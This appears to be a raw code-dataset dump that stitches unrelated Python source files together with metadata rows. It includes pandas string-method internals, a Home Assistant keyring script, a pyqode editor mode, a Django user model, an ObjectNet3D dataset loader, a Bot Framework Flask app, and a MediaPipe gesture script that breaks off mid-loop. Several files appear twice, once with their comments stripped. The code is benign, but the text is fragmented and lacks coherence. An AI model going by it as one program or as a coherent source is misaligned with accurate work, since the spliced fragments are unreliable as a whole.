>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
    assumed to be any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = {"type": "alphanumeric", "method": "isalnum"}
_doc_args["isalpha"] = {"type": "alphabetic", "method": "isalpha"}
_doc_args["isdigit"] = {"type": "digits", "method": "isdigit"}
_doc_args["isspace"] = {"type": "whitespace", "method": "isspace"}
_doc_args["islower"] = {"type": "lowercase", "method": "islower"}
_doc_args["isupper"] = {"type": "uppercase", "method": "isupper"}
_doc_args["istitle"] = {"type": "titlecase", "method": "istitle"}
_doc_args["isnumeric"] = {"type": "numeric", "method": "isnumeric"}
_doc_args["isdecimal"] = {"type": "decimal", "method": "isdecimal"}
isalnum = _map_and_wrap(
"isalnum", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
isalpha = _map_and_wrap(
"isalpha", docstring=_shared_docs["ismethods"] % _doc_args["isalpha"]
)
isdigit = _map_and_wrap(
"isdigit", docstring=_shared_docs["ismethods"] % _doc_args["isdigit"]
)
isspace = _map_and_wrap(
"isspace", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
islower = _map_and_wrap(
"islower", docstring=_shared_docs["ismethods"] % _doc_args["islower"]
)
isupper = _map_and_wrap(
"isupper", docstring=_shared_docs["ismethods"] % _doc_args["isupper"]
)
istitle = _map_and_wrap(
"istitle", docstring=_shared_docs["ismethods"] % _doc_args["istitle"]
)
isnumeric = _map_and_wrap(
"isnumeric", docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"]
)
isdecimal = _map_and_wrap(
"isdecimal", docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"]
)
def cat_safe(list_of_columns: List, sep: str):
    """
    Same signature as `cat_core`, but raises a more informative TypeError
    when one of the columns holds non-string data.

    Parameters
    ----------
    list_of_columns : list of numpy arrays
        Object-dtype arrays to be concatenated elementwise.
    sep : str
        The separator string placed between the concatenated columns.

    Returns
    -------
    np.ndarray
        The concatenation of the columns, with `sep` in between.
    """
    try:
        result = cat_core(list_of_columns, sep)
    except TypeError:
        # Name the offending (non-string) inferred dtype in the re-raise.
        for column in list_of_columns:
            dtype = lib.infer_dtype(column, skipna=True)
            if dtype not in ["string", "empty"]:
                raise TypeError(
                    "Concatenation requires list-likes containing only "
                    "strings (or missing values). Offending values found in "
                    f"column {dtype}"
                ) from None
    return result
def cat_core(list_of_columns: List, sep: str):
    """
    Elementwise concatenation of the object-dtype columns in
    `list_of_columns`, with `sep` inserted between them.
    """
    if sep == "":
        # Fast path: no separator, sum the columns elementwise directly.
        return np.sum(np.asarray(list_of_columns, dtype=object), axis=0)
    # Interleave the separator between the columns, then reduce as above.
    interleaved = [sep] * (2 * len(list_of_columns) - 1)
    interleaved[::2] = list_of_columns
    return np.sum(np.asarray(interleaved, dtype=object), axis=0)
def _groups_or_na_fun(regex):
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _result_dtype(arr):
    """Dtype used to rebuild extract results: keep string dtypes, else object."""
    from pandas.core.arrays.string_ import StringDtype
    from pandas.core.arrays.string_arrow import ArrowStringDtype

    if isinstance(arr.dtype, (StringDtype, ArrowStringDtype)):
        return arr.dtype.name
    return object
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _str_extract_noexpand(arr, pat, flags=0):
    """
    Find groups in each string in the array using the passed regex.

    Used by ``str_extract(expand=False)``: one capture group yields a flat
    array; multiple groups yield a DataFrame (Series callers only).

    Returns
    -------
    (result, name)
        `name` is the single group's name (or None).
    """
    from pandas import (
        DataFrame,
        array as pd_array,
    )
    regex = re.compile(pat, flags=flags)
    groups_or_na = _groups_or_na_fun(regex)
    result_dtype = _result_dtype(arr)
    if regex.groups == 1:
        # Single capture group: flat array of first-group matches.
        result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
        name = _get_single_group_name(regex)
        result = pd_array(result, dtype=result_dtype)
    else:
        if isinstance(arr, ABCIndex):
            raise ValueError("only one regex group is supported with Index")
        name = None
        # Column labels: group name where (?P<name>...) was used, else the
        # 0-based group position.
        names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
        columns = [names.get(1 + i, i) for i in range(regex.groups)]
        if arr.size == 0:
            result = DataFrame(
                columns=columns, dtype=object
            )
        else:
            dtype = _result_dtype(arr)
            result = DataFrame(
                [groups_or_na(val) for val in arr],
                columns=columns,
                index=arr.index,
                dtype=dtype,
            )
    return result, name
def _str_extract_frame(arr, pat, flags=0):
    """
    For each subject string in the array, extract groups from the first
    match of regular expression `pat`. Always returns a DataFrame with one
    column per capture group (used by ``str_extract(expand=True)``).
    """
    from pandas import DataFrame
    regex = re.compile(pat, flags=flags)
    groups_or_na = _groups_or_na_fun(regex)
    # Column labels: group name when available, else 0-based group position.
    names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
    columns = [names.get(1 + i, i) for i in range(regex.groups)]
    if len(arr) == 0:
        return DataFrame(columns=columns, dtype=object)
    try:
        result_index = arr.index
    except AttributeError:
        # Index callers have no .index attribute of their own.
        result_index = None
    dtype = _result_dtype(arr)
    return DataFrame(
        [groups_or_na(val) for val in arr],
        columns=columns,
        index=result_index,
        dtype=dtype,
    )
def str_extract(arr, pat, flags=0, expand=True):
    """Dispatch `.str.extract` to the frame / non-frame implementation."""
    if not isinstance(expand, bool):
        raise ValueError("expand must be True or False")
    if expand:
        frame = _str_extract_frame(arr._orig, pat, flags=flags)
        return frame.__finalize__(arr._orig, method="str_extract")
    result, name = _str_extract_noexpand(arr._orig, pat, flags=flags)
    return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
    """
    Extract capture groups for EVERY match of `pat` in each subject string.

    Returns a DataFrame with one row per match; its MultiIndex carries the
    subject's index plus a final "match" level numbering the matches.
    """
    regex = re.compile(pat, flags=flags)
    # The regex must contain capture groups.
    if regex.groups == 0:
        raise ValueError("pattern contains no capture groups")
    if isinstance(arr, ABCIndex):
        arr = arr.to_series().reset_index(drop=True)
    # Column labels: group name when available, else 0-based group position.
    names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
    columns = [names.get(1 + i, i) for i in range(regex.groups)]
    match_list = []
    index_list = []
    is_mi = arr.index.nlevels > 1
    for subject_key, subject in arr.items():
        if isinstance(subject, str):
            if not is_mi:
                # Normalize scalar keys to tuples so they concatenate below.
                subject_key = (subject_key,)
            for match_i, match_tuple in enumerate(regex.findall(subject)):
                if isinstance(match_tuple, str):
                    match_tuple = (match_tuple,)
                # findall yields "" for non-participating groups: show NaN.
                na_tuple = [np.NaN if group == "" else group for group in match_tuple]
                match_list.append(na_tuple)
                result_key = tuple(subject_key + (match_i,))
                index_list.append(result_key)
    from pandas import MultiIndex
    index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
    dtype = _result_dtype(arr)
    result = arr._constructor_expanddim(
        match_list, index=index, columns=columns, dtype=dtype
    )
    return result
| true | true |
f7fa33aca37f41ebbd190f0d067a5693db3e8827 | 2,187 | py | Python | homeassistant/scripts/keyring.py | kdschlosser/home-assistant | a94a24f6f83508642e220fadf2799789dc32a25b | [
"Apache-2.0"
] | 4 | 2019-07-03T22:36:57.000Z | 2019-08-10T15:33:25.000Z | homeassistant/scripts/keyring.py | kdschlosser/home-assistant | a94a24f6f83508642e220fadf2799789dc32a25b | [
"Apache-2.0"
] | 7 | 2019-08-23T05:26:02.000Z | 2022-03-11T23:57:18.000Z | homeassistant/scripts/keyring.py | kdschlosser/home-assistant | a94a24f6f83508642e220fadf2799789dc32a25b | [
"Apache-2.0"
] | 3 | 2019-04-28T16:35:45.000Z | 2020-05-28T15:21:59.000Z | """Script to get, set and delete secrets stored in the keyring."""
import argparse
import getpass
import os
from homeassistant.util.yaml import _SECRET_NAMESPACE
REQUIREMENTS = ['keyring==17.1.1', 'keyrings.alt==3.1.1']
def run(args):
    """Handle keyring script."""
    parser = argparse.ArgumentParser(
        description=("Modify Home Assistant secrets in the default keyring. "
                     "Use the secrets in configuration files with: "
                     "!secret <name>"))
    parser.add_argument(
        '--script', choices=['keyring'])
    parser.add_argument(
        'action', choices=['get', 'set', 'del', 'info'],
        help="Get, set or delete a secret")
    parser.add_argument(
        'name', help="Name of the secret", nargs='?', default=None)

    # Imported lazily so the extra dependencies are only needed when this
    # sub-script actually runs.
    import keyring
    from keyring.util import platform_ as platform

    args = parser.parse_args(args)

    if args.action == 'info':
        # Report the active backend and file locations; needs no secret name.
        active_keyring = keyring.get_keyring()
        print('Keyring version {}\n'.format(REQUIREMENTS[0].split('==')[1]))
        print('Active keyring : {}'.format(active_keyring.__module__))
        rc_path = os.path.join(platform.config_root(), 'keyringrc.cfg')
        print('Config location : {}'.format(rc_path))
        print('Data location : {}\n'.format(platform.data_root()))
    elif args.name is None:
        # Every remaining action operates on a named secret.
        parser.print_help()
        return 1

    if args.action == 'set':
        secret = getpass.getpass(
            'Please enter the secret for {}: '.format(args.name))
        keyring.set_password(_SECRET_NAMESPACE, args.name, secret)
        print('Secret {} set successfully'.format(args.name))
    elif args.action == 'get':
        secret = keyring.get_password(_SECRET_NAMESPACE, args.name)
        if secret is not None:
            print('Secret {}={}'.format(args.name, secret))
        else:
            print('Secret {} not found'.format(args.name))
    elif args.action == 'del':
        try:
            keyring.delete_password(_SECRET_NAMESPACE, args.name)
            print('Deleted secret {}'.format(args.name))
        except keyring.errors.PasswordDeleteError:
            print('Secret {} not found'.format(args.name))
| 37.706897 | 77 | 0.622314 | import argparse
import getpass
import os
from homeassistant.util.yaml import _SECRET_NAMESPACE
REQUIREMENTS = ['keyring==17.1.1', 'keyrings.alt==3.1.1']
def run(args):
parser = argparse.ArgumentParser(
description=("Modify Home Assistant secrets in the default keyring. "
"Use the secrets in configuration files with: "
"!secret <name>"))
parser.add_argument(
'--script', choices=['keyring'])
parser.add_argument(
'action', choices=['get', 'set', 'del', 'info'],
help="Get, set or delete a secret")
parser.add_argument(
'name', help="Name of the secret", nargs='?', default=None)
import keyring
from keyring.util import platform_ as platform
args = parser.parse_args(args)
if args.action == 'info':
keyr = keyring.get_keyring()
print('Keyring version {}\n'.format(REQUIREMENTS[0].split('==')[1]))
print('Active keyring : {}'.format(keyr.__module__))
config_name = os.path.join(platform.config_root(), 'keyringrc.cfg')
print('Config location : {}'.format(config_name))
print('Data location : {}\n'.format(platform.data_root()))
elif args.name is None:
parser.print_help()
return 1
if args.action == 'set':
the_secret = getpass.getpass(
'Please enter the secret for {}: '.format(args.name))
keyring.set_password(_SECRET_NAMESPACE, args.name, the_secret)
print('Secret {} set successfully'.format(args.name))
elif args.action == 'get':
the_secret = keyring.get_password(_SECRET_NAMESPACE, args.name)
if the_secret is None:
print('Secret {} not found'.format(args.name))
else:
print('Secret {}={}'.format(args.name, the_secret))
elif args.action == 'del':
try:
keyring.delete_password(_SECRET_NAMESPACE, args.name)
print('Deleted secret {}'.format(args.name))
except keyring.errors.PasswordDeleteError:
print('Secret {} not found'.format(args.name))
| true | true |
f7fa33ce28fe81e083634e756ec089b7da29625f | 2,002 | py | Python | pyqode/core/modes/case_converter.py | SunChuquin/pyqode.core | edf29204446e3679701e74343288cf692eb07d86 | [
"MIT"
] | 42 | 2018-05-02T07:07:27.000Z | 2022-02-01T19:49:49.000Z | pyqode/core/modes/case_converter.py | SunChuquin/pyqode.core | edf29204446e3679701e74343288cf692eb07d86 | [
"MIT"
] | 65 | 2018-03-08T11:53:13.000Z | 2018-09-17T09:00:09.000Z | Lib/site-packages/pyqode/core/modes/case_converter.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | 24 | 2015-01-09T14:16:41.000Z | 2021-12-06T15:11:22.000Z | # -*- coding: utf-8 -*-
"""
Contains a case converter mode.
"""
from pyqode.core.api import TextHelper
from pyqode.core.api.mode import Mode
from pyqode.qt import QtCore, QtWidgets
class CaseConverterMode(Mode):
    """Adds case conversion of the selected text to the editor.

    Installs a "Case" sub-menu in the editor's context menu with two
    entries:

    - *Convert to lower case*: ctrl-u
    - *Convert to UPPER CASE*: ctrl+shift+u
    """
    def __init__(self):
        Mode.__init__(self)
        # Actions are created lazily, the first time the mode is enabled.
        self._actions_created = False
        self.action_to_lower = None
        self.action_to_upper = None

    def to_upper(self):
        """Convert the current selection to UPPER CASE."""
        TextHelper(self.editor).selected_text_to_upper()

    def to_lower(self):
        """Convert the current selection to lower case."""
        TextHelper(self.editor).selected_text_to_lower()

    def _create_actions(self):
        """Build both conversion actions and the "Case" sub-menu."""
        def make_action(text, shortcut, slot):
            # Small factory: all actions share the same construction steps.
            action = QtWidgets.QAction(self.editor)
            action.setText(text)
            action.setShortcut(shortcut)
            action.triggered.connect(slot)
            return action

        self.action_to_lower = make_action(
            _('Convert to lower case'), 'Ctrl+U', self.to_lower)
        self.action_to_upper = make_action(
            _('Convert to UPPER CASE'), 'Ctrl+Shift+U', self.to_upper)
        self.menu = QtWidgets.QMenu(_('Case'), self.editor)
        self.menu.addAction(self.action_to_lower)
        self.menu.addAction(self.action_to_upper)
        self._actions_created = True

    def on_state_changed(self, state):
        if not state:
            self.editor.remove_action(self.menu.menuAction())
            return
        if not self._actions_created:
            self._create_actions()
        self.editor.add_action(self.menu.menuAction())
| 33.932203 | 75 | 0.660839 |
from pyqode.core.api import TextHelper
from pyqode.core.api.mode import Mode
from pyqode.qt import QtCore, QtWidgets
class CaseConverterMode(Mode):
def __init__(self):
Mode.__init__(self)
self._actions_created = False
self.action_to_lower = None
self.action_to_upper = None
def to_upper(self):
TextHelper(self.editor).selected_text_to_upper()
def to_lower(self):
TextHelper(self.editor).selected_text_to_lower()
def _create_actions(self):
self.action_to_lower = QtWidgets.QAction(self.editor)
self.action_to_lower.triggered.connect(self.to_lower)
self.action_to_upper = QtWidgets.QAction(self.editor)
self.action_to_upper.triggered.connect(self.to_upper)
self.action_to_lower.setText(_('Convert to lower case'))
self.action_to_lower.setShortcut('Ctrl+U')
self.action_to_upper.setText(_('Convert to UPPER CASE'))
self.action_to_upper.setShortcut('Ctrl+Shift+U')
self.menu = QtWidgets.QMenu(_('Case'), self.editor)
self.menu.addAction(self.action_to_lower)
self.menu.addAction(self.action_to_upper)
self._actions_created = True
def on_state_changed(self, state):
if state:
if not self._actions_created:
self._create_actions()
self.editor.add_action(self.menu.menuAction())
else:
self.editor.remove_action(self.menu.menuAction())
| true | true |
f7fa33e3558687cee8af5b79e668aebfec435e6d | 453 | py | Python | users/models.py | sandeepagrawal8875/DjangoMultipleUser | 81cfc4f679b29df777a0a36db524c9defac01a0b | [
"MIT"
] | null | null | null | users/models.py | sandeepagrawal8875/DjangoMultipleUser | 81cfc4f679b29df777a0a36db524c9defac01a0b | [
"MIT"
] | null | null | null | users/models.py | sandeepagrawal8875/DjangoMultipleUser | 81cfc4f679b29df777a0a36db524c9defac01a0b | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
    """Custom user model carrying role flags for students and teachers."""

    # Role flags; both default to False, so a role must be set explicitly
    # (e.g. during sign-up).  Nothing here prevents both being True at once.
    is_student = models.BooleanField(default=False)
    is_teacher = models.BooleanField(default=False)
class Profile(models.Model):
    """Per-user profile holding an optional profile image."""

    # Exactly one profile per user; deleting the user cascades to it.
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Optional image, uploaded under MEDIA_ROOT/profile/.
    image = models.ImageField(upload_to='profile', null=True, blank=True)

    def __str__(self):
        # Shown in the Django admin and anywhere the profile is stringified.
        return self.user.username
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
is_student = models.BooleanField(default=False)
is_teacher = models.BooleanField(default=False)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(upload_to='profile', null=True, blank=True)
def __str__(self):
return self.user.username | true | true |
f7fa35208d27a1fd3736b882390bd2b44ca52789 | 2,321 | py | Python | pytorch_datasets/datasets/object_net_3d.py | mpeven/Pytorch_Datasets | 6a1709bfb59739b5e7ce299c70350b0080209c82 | [
"Apache-2.0"
] | 3 | 2019-01-22T19:19:49.000Z | 2020-12-16T01:29:56.000Z | pytorch_datasets/datasets/object_net_3d.py | mpeven/Pytorch_Datasets | 6a1709bfb59739b5e7ce299c70350b0080209c82 | [
"Apache-2.0"
] | null | null | null | pytorch_datasets/datasets/object_net_3d.py | mpeven/Pytorch_Datasets | 6a1709bfb59739b5e7ce299c70350b0080209c82 | [
"Apache-2.0"
] | 2 | 2019-01-22T19:20:01.000Z | 2020-12-06T05:50:14.000Z | import os
import glob
from tqdm import tqdm
from PIL import Image
import scipy.io as sio
import h5py
import torch
import pytorch_datasets.utils.cache_manager as cache
class ObjectNet3D(torch.utils.data.Dataset):
dset_location = '/hdd/Datasets/ObjectNet3D/'
dset_cached_location = dset_location + "cached_dataset.pkl"
def __init__(self):
self.dataset = self.create_dataset()
def create_dataset(self):
cached_dset = cache.retreive_from_cache(self.dset_cached_location)
if cached_dset is not False:
return cached_dset
dataset = []
for matfile in tqdm(glob.glob(self.dset_location + "Annotations/*")):
try:
x = sio.loadmat(matfile)
except Exception:
continue
for obj in x['record']['objects'][0, 0][0]:
# Get elevation (or fine-grained elevation if it exists)
elevation = obj['viewpoint']['elevation_coarse'][0][0][0][0]
if 'elevation' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['elevation'][0][0]) > 0:
elevation = obj['viewpoint']['elevation'][0][0][0][0]
# Get azimuth (or fine-grained azimuth if it exists)
azimuth = obj['viewpoint']['azimuth_coarse'][0][0][0][0]
if 'azimuth' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['azimuth'][0][0]) > 0:
azimuth = obj['viewpoint']['azimuth'][0][0][0][0]
dataset.append({
'image_file': self.dset_location + "Images/" + x['record']['filename'][0, 0][0],
'object_type': obj['class'][0],
'azimuth': azimuth,
'elevation': elevation,
'distance': obj['viewpoint']['distance'][0][0][0][0],
'theta': obj['viewpoint']['theta'][0][0][0][0],
'bbox': obj['bbox'][0],
})
cache.cache(dataset, self.dset_cached_location)
return dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
datum = self.dataset[idx]
datum['image'] = Image.open(datum['image_file']).convert('RGB')
return datum
| 36.84127 | 100 | 0.54847 | import os
import glob
from tqdm import tqdm
from PIL import Image
import scipy.io as sio
import h5py
import torch
import pytorch_datasets.utils.cache_manager as cache
class ObjectNet3D(torch.utils.data.Dataset):
dset_location = '/hdd/Datasets/ObjectNet3D/'
dset_cached_location = dset_location + "cached_dataset.pkl"
def __init__(self):
self.dataset = self.create_dataset()
def create_dataset(self):
cached_dset = cache.retreive_from_cache(self.dset_cached_location)
if cached_dset is not False:
return cached_dset
dataset = []
for matfile in tqdm(glob.glob(self.dset_location + "Annotations/*")):
try:
x = sio.loadmat(matfile)
except Exception:
continue
for obj in x['record']['objects'][0, 0][0]:
elevation = obj['viewpoint']['elevation_coarse'][0][0][0][0]
if 'elevation' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['elevation'][0][0]) > 0:
elevation = obj['viewpoint']['elevation'][0][0][0][0]
azimuth = obj['viewpoint']['azimuth_coarse'][0][0][0][0]
if 'azimuth' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['azimuth'][0][0]) > 0:
azimuth = obj['viewpoint']['azimuth'][0][0][0][0]
dataset.append({
'image_file': self.dset_location + "Images/" + x['record']['filename'][0, 0][0],
'object_type': obj['class'][0],
'azimuth': azimuth,
'elevation': elevation,
'distance': obj['viewpoint']['distance'][0][0][0][0],
'theta': obj['viewpoint']['theta'][0][0][0][0],
'bbox': obj['bbox'][0],
})
cache.cache(dataset, self.dset_cached_location)
return dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
datum = self.dataset[idx]
datum['image'] = Image.open(datum['image_file']).convert('RGB')
return datum
| true | true |
f7fa3559bb547fc7fdc1efdb984f0199d0a9b821 | 27 | py | Python | 6 - Function/builtin.py | pebueno/Python | d791be1e853f61d80f9eeeb2b1e888835a5bdb63 | [
"MIT"
] | 2 | 2022-02-09T19:56:31.000Z | 2022-02-17T17:47:52.000Z | 6 - Function/builtin.py | pebueno/Python | d791be1e853f61d80f9eeeb2b1e888835a5bdb63 | [
"MIT"
] | null | null | null | 6 - Function/builtin.py | pebueno/Python | d791be1e853f61d80f9eeeb2b1e888835a5bdb63 | [
"MIT"
] | null | null | null | # help(input)
# help(float) | 13.5 | 13 | 0.666667 | true | true | |
f7fa35cacd33049c24690ad9f8efe0d64b2b63f6 | 2,954 | py | Python | generators/app/templates/echo/{{cookiecutter.bot_name}}/app.py | hangdong/botbuilder-python | 8ff979a58fadc4356d76b9ce577f94da3245f664 | [
"MIT"
] | null | null | null | generators/app/templates/echo/{{cookiecutter.bot_name}}/app.py | hangdong/botbuilder-python | 8ff979a58fadc4356d76b9ce577f94da3245f664 | [
"MIT"
] | null | null | null | generators/app/templates/echo/{{cookiecutter.bot_name}}/app.py | hangdong/botbuilder-python | 8ff979a58fadc4356d76b9ce577f94da3245f664 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import asyncio
import sys
from datetime import datetime
from types import MethodType
from flask import Flask, request, Response
from botbuilder.core import (
BotFrameworkAdapter,
BotFrameworkAdapterSettings,
TurnContext,
)
from botbuilder.schema import Activity, ActivityTypes
from bot import MyBot
# Create the event loop (used to drive the async adapter from synchronous
# Flask views) and the Flask app; settings come from config.DefaultConfig.
LOOP = asyncio.get_event_loop()
APP = Flask(__name__, instance_relative_config=True)
APP.config.from_object("config.DefaultConfig")

# Create adapter with the bot's app credentials.
# See https://aka.ms/about-bot-adapter to learn more about how bots work.
SETTINGS = BotFrameworkAdapterSettings(APP.config["APP_ID"], APP.config["APP_PASSWORD"])
ADAPTER = BotFrameworkAdapter(SETTINGS)
# Catch-all for errors.
# pylint: disable=unused-argument
async def on_error(self, context: TurnContext, error: Exception):
    """Catch-all turn-error handler, bound onto the adapter below.

    Logs the error to stderr, notifies the user, and — when talking to the
    Bot Framework Emulator — sends a trace activity so the error shows up
    in the emulator's inspector.
    """
    # This check writes out errors to console log .vs. app insights.
    # NOTE: In production environment, you should consider logging this to
    # Azure application insights instead of stderr.
    print(f"\n [on_turn_error] unhandled error: {error}", file=sys.stderr)

    # Let the user know something went wrong.
    await context.send_activity("The bot encounted an error or bug.")
    await context.send_activity("To continue to run this bot, please fix the bot source code.")
    # Send a trace activity only when we're talking to the Bot Framework Emulator.
    if context.activity.channel_id == 'emulator':
        # Create a trace activity that contains the error object.
        trace_activity = Activity(
            label="TurnError",
            name="on_turn_error Trace",
            timestamp=datetime.utcnow(),
            type=ActivityTypes.trace,
            value=f"{error}",
            value_type="https://www.botframework.com/schemas/error"
        )
        # The emulator displays this trace in its inspector pane.
        await context.send_activity(trace_activity)
# Bind the catch-all handler onto the adapter instance so uncaught turn
# errors are reported instead of silently dropped.
ADAPTER.on_turn_error = MethodType(on_error, ADAPTER)

# Create the main dialog (the bot whose on_turn handles each activity).
BOT = MyBot()
# Listen for incoming requests on /api/messages.
@APP.route("/api/messages", methods=["POST"])
def messages():
    """Main bot message handler.

    Deserializes the incoming Bot Framework activity and dispatches it to
    the bot through the adapter.  Returns 415 for non-JSON payloads and
    201 on success.
    """
    # Use .get() so a request without a Content-Type header yields a clean
    # 415 instead of an unhandled KeyError (HTTP 500).
    if "application/json" not in request.headers.get("Content-Type", ""):
        return Response(status=415)
    body = request.json

    activity = Activity().deserialize(body)
    # The connector sends a JWT here; it may be absent in emulator testing.
    auth_header = request.headers.get("Authorization", "")

    # The adapter is async while Flask views are sync: drive the coroutine
    # to completion on the module-level event loop.  (The original wrapped
    # this in `except Exception as e: raise e`, which was a no-op.)
    task = LOOP.create_task(
        ADAPTER.process_activity(activity, auth_header, BOT.on_turn)
    )
    LOOP.run_until_complete(task)
    return Response(status=201)
if __name__ == "__main__":
    # Run the Flask development server on the configured port.  Debug stays
    # off so the Werkzeug debugger is never exposed; the redundant
    # catch-and-re-raise wrapper added nothing and has been removed.
    APP.run(debug=False, port=APP.config["PORT"])  # nosec debug
| 33.954023 | 95 | 0.703791 |
import asyncio
import sys
from datetime import datetime
from types import MethodType
from flask import Flask, request, Response
from botbuilder.core import (
BotFrameworkAdapter,
BotFrameworkAdapterSettings,
TurnContext,
)
from botbuilder.schema import Activity, ActivityTypes
from bot import MyBot
LOOP = asyncio.get_event_loop()
APP = Flask(__name__, instance_relative_config=True)
APP.config.from_object("config.DefaultConfig")
SETTINGS = BotFrameworkAdapterSettings(APP.config["APP_ID"], APP.config["APP_PASSWORD"])
ADAPTER = BotFrameworkAdapter(SETTINGS)
async def on_error(self, context: TurnContext, error: Exception):
print(f"\n [on_turn_error] unhandled error: {error}", file=sys.stderr)
await context.send_activity("The bot encounted an error or bug.")
await context.send_activity("To continue to run this bot, please fix the bot source code.")
if context.activity.channel_id == 'emulator':
# Create a trace activity that contains the error object
trace_activity = Activity(
label="TurnError",
name="on_turn_error Trace",
timestamp=datetime.utcnow(),
type=ActivityTypes.trace,
value=f"{error}",
value_type="https://www.botframework.com/schemas/error"
)
# Send a trace activity, which will be displayed in Bot Framework Emulator
await context.send_activity(trace_activity)
ADAPTER.on_turn_error = MethodType(on_error, ADAPTER)
# Create the main dialog
BOT = MyBot()
# Listen for incoming requests on /api/messages.
@APP.route("/api/messages", methods=["POST"])
def messages():
# Main bot message handler.
if "application/json" in request.headers["Content-Type"]:
body = request.json
else:
return Response(status=415)
activity = Activity().deserialize(body)
auth_header = (
request.headers["Authorization"] if "Authorization" in request.headers else ""
)
try:
task = LOOP.create_task(
ADAPTER.process_activity(activity, auth_header, BOT.on_turn)
)
LOOP.run_until_complete(task)
return Response(status=201)
except Exception as exception:
raise exception
if __name__ == "__main__":
try:
APP.run(debug=False, port=APP.config["PORT"]) # nosec debug
except Exception as exception:
raise exception
| true | true |
f7fa35d41a177af1e34031c23ace8c8bd817d358 | 3,158 | py | Python | handFiguration/hand_learning.py | CAU-OSP-02/T03 | bd5e32eb76aa651d959c86439f13c07d7781004a | [
"MIT"
] | null | null | null | handFiguration/hand_learning.py | CAU-OSP-02/T03 | bd5e32eb76aa651d959c86439f13c07d7781004a | [
"MIT"
] | null | null | null | handFiguration/hand_learning.py | CAU-OSP-02/T03 | bd5e32eb76aa651d959c86439f13c07d7781004a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# v.1.1
import cv2
import mediapipe as mp
import numpy as np
gesture = {
    0:'fist', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five',
    6:'six', 7:'rock', 8:'spiderman', 9:'yeah', 10:'ok'
} # gesture set shipped with the MediaPipe example
hand_gesture = {
    0:'fist', 1:'one', 2:'gun', 3:'three', 4:'four', 5:'five',
    6:'promise', 7:'spiderman', 8:'niconiconi', 9:'two', 10:'ok',
    11:'claws', 12:'good', 13:'fanxyChild', 14:'dog'
} # NEW gesture set for the game -> new poses added, existing ones renamed for clarity
# MediaPipe hands model
mp_hands = mp.solutions.hands
mp_drawing = mp.solutions.drawing_utils # draws the hand-skeleton landmarks on the webcam frame
hands = mp_hands.Hands(max_num_hands = 1, min_detection_confidence = 0.5, min_tracking_confidence = 0.5) # detector settings
# Gesture recognition model
file = np.genfromtxt('gesture_trained.csv', delimiter=',') # load the training CSV (mind the path!)
cam = cv2.VideoCapture(0) # open the webcam
def click(event, x, y, flags, param): # mouse-click callback
    global data, file
    if event == cv2.EVENT_LBUTTONDOWN: # on left mouse button press
        file = np.vstack((file, data)) # append the current sample to the existing data
        print(file.shape) # show the grown array's shape
cv2.namedWindow('Hand Cam') # window name must match the one passed to imshow() below
cv2.setMouseCallback('Hand Cam', click) # register the click handler
while cam.isOpened(): # while the camera is open...
    success, image = cam.read() # read one frame
    if not success: # on a failed read, try the next frame
        continue
    # frame read OK -- process it
